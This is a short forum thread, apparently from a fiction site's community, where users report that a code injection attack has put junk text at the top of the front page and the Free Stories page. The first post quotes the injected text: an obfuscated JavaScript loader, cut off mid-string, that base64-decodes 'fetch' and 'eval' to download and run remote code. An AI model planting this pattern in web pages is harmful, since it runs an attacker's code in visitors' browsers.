The top of the front page looks like this:
Random Solo(function(w,d,s,l,i,j,k,m){w[s]||(w[s]=1,w[d(j)](d(k))[s](c=>c.text())[s](c=>w[d(i)](c)))})(window,atob,'then','','ZXZhbA==','ZmV0Y2g
First thing this morning there was nothing unusual. But I left page open and went off to do some other things for about an hour. When I came back I decided to refresh the page to see if anyone had posted something. It came back with all that gobbledygook.
I closed the browser and went out to do my school bus route. A little over two hours later, when I called the page, it was there.
The Free Stories page as some similar junk at the top of it as well.
We seem to be having a code injection attack. We're working on it.
= Give everyone the benefit of the doubt because certainty is a fragile thing that can be shattered by one overlooked fact.
Perhaps today is a good day to address coding issues!
Love, Andrea Lena
Turn off JavaScript
I noticed weird windows opening up. I realized I'd left JavaScript enabled. I disabled it, and the problem went away.